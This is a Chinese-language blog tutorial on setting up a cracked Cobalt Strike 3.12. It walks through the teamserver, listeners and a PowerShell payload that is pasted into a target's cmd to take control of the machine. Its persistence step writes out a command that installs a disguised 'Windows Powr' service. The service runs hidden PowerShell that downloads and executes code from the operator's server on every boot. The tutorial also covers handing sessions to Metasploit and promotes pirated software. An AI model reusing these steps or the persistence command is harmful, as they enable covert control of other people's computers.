0x01 介绍
Cobalt Strike3.12是一款渗透测试神器,是外国人写的,常被业界人称为CS神器。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。我对其中的一些主要功能做一个介绍吧。
0x02 下载
我选择的是cobaltstrike 3.12的破解版,被某大佬破解也没多久。分析过,暂无发现后门。先下载,会有三个文件。
0x03 安装
购买的服务器配置也不要太渣了吧,至少你也得搞个1G以上的内存吧。2G内存才为正常水平。
Linux服务器安装好:java。
系统可以选用:Centos 64, Deepin 64, Ubuntu 64 其中任意一种。
把cobaltstrike-linux.zip放置到Linux服务器任意目录。使用命令解压。
进入cobaltstrike-linux文件夹后,启动teamserver文件,使用命令启动服务端:./teamserver 服务器IP 密码; 再回车。没有出现错误即启动成功。看下图。
0x04 客户端
在本地解压cobaltstrike-win.zip(我用的是Windows系统),双击启动Cobaltstrike.exe。
输入好IP和连接密码, 用户名可以不用输。用默认就好了,再点击Connect连接 。
0x05 监听
连接上了后,点击左上角的Cobalt—>Listenrs,会出现Listeners栏目。
点击Add 弹出输入框,输入Name,Port监听的端口号。点击Save保存。
一 直点击确定就好了。就可以看到多了一个刚才创建的Listeners。监听的设置就完工了 。
0x06 目标机上线
目标机器上线前,要创建一个Payload,看图创建。
我最多用的是Powershell反弹方式,我就创建Powershell。注意:Payload端口要和之前设置监听的端口保持一致。 没有Powershell也可以选择创建Python、regsvr32、bitsadmin的类型。之后再点击Launch。
会提示创建成功:Success字样。
这里复制 框的中一串长命令,点击OK即可。
在目标机器的cmd窗口:粘贴刚才复制的命令,回车。
就可以看到,目标机器上线成功了,也就控制成功了。
0x07 权限维持
虽然上线了,但目标机器因为意外情况重启后,并不会重新上线,所以要给目标机器加一个开机自启。
添加开机自启命令:
shell sc create "Windows Powr" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://你的ip/创建时的name'))\""&sc config "Windows Powr" start= auto
选中机器,右击选择Interact ,粘贴那一串开机自启命令,回车。请看图操作:
0x08 反弹到Msf神器
在任意的云VPS主机上启动Msf,进行监听。
我是这么监听的,看下图:
在CS上选择一个目标机器,右击再点击Spawn功能,add添加Choose listener,填写好Msf监听的IP,端口,name随便输入。保存即可。
选择刚才创建的Choose listener,点击Choose。Msf坐等上线。
0x09 其他
CS的功能有很多,比如:读取远程登录密码、一键提权、文件管理、命令执行、网站劫持、键盘记录、绕杀软、流量转发-日内网、等等很实用的功能,就不一一介绍了。不得不佩服老外写的东西确实可以的。